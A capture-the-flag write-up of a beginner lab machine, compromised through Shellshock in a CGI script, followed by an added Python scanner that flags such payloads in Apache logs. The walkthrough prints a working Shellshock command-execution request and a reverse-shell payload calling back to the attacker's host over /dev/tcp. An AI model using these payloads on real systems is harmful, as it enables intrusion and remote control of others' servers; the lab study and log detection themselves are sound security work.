    The description states that the box is "Beginner" and "Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root)."  I don't want to put too much information up front but if you haven't been hacking for long, this is a blast from the past with a neat entry. 

    We kick off with Nmap:



    Two ports open so we're going to hit the web port with Nikto:


    As I'm typing this, I just realized I never even bothered looking with a browser because as soon as I saw Shellshock, I knew where I was headed.  That just comes from experience and having seen this vulnerability a ton of times.

    Keeping things simple, let's just see if this is really vulnerable:

    curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi


    Excellent!  We execute id and we get a response.  Now let's see if we can get a shell:

    curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi


    With our handler set up:


    Excellent!  We catch our shell and we clean up the environment.  Now let's see what we're dealing with:


    Ok, this is an old version of Ubuntu which is probably vulnerable to Dirty Cow but let's go for something different:


    We move the exploit over to the victim and when we try to compile, we get an error.  We can fix that error with the following:

    PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/; export PATH


    We execute our exploit, we check our ID, and we go for the root flag!  #GameOver

    I would definitely call this a beginner box but if you haven't played with Shellshock, it's new to you.  The error is also a wildcard.  I don't know if that was intentional or not but I've seen that as well and I had the fix in my notes.
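Both curl requests above carry the Bash function-definition prefix `() {` in the User-Agent header, which Apache writes to its access log. The following is an added example, not part of the original walkthrough: a small scanner that flags such headers in "combined" format logs and separates plain probes from requests that redirect through /dev/tcp. The log lines, timestamps, and the names `scan` and `SAMPLE_LOG` are constructed for illustration.

```python
import re

# Apache "combined" log line: ip - user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Bash function-definition prefix at the start of a header value (spacing tolerated).
FUNC_PREFIX = re.compile(r'^\s*\(\s*\)\s*\{')
# Redirection through bash's /dev/tcp or /dev/udp, as in the reverse-shell request.
NET_REDIRECT = re.compile(r'/dev/(?:tcp|udp)/')

# Constructed sample: the two User-Agent values from the post plus one normal request.
SAMPLE_LOG = [
    '192.168.86.99 - - [01/Jan/2021:10:00:01 +0000] "GET /cgi-bin/test/test.cgi HTTP/1.1" '
    '200 57 "-" "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id"',
    '192.168.86.99 - - [01/Jan/2021:10:00:09 +0000] "GET /cgi-bin/test/test.cgi HTTP/1.1" '
    '200 0 "-" "() { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1"',
    '192.168.86.20 - - [01/Jan/2021:10:00:15 +0000] "GET /index.html HTTP/1.1" '
    '200 177 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def scan(lines):
    """Return (line_no, client_ip, path, header, kind) for each suspicious header."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = COMBINED.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; skip rather than guess at fields
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else "?"
        for header in ("referer", "agent"):
            value = m.group(header)
            if FUNC_PREFIX.match(value):
                # "callback" = payload opens a network connection; "probe" = anything else
                kind = "callback" if NET_REDIRECT.search(value) else "probe"
                findings.append((line_no, m.group("ip"), path, header, kind))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The combined format records only Referer and User-Agent, so a payload sent in any other header will not appear in this log.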



    © 2021 Seven Layer Networks, Inc. | All rights reserved.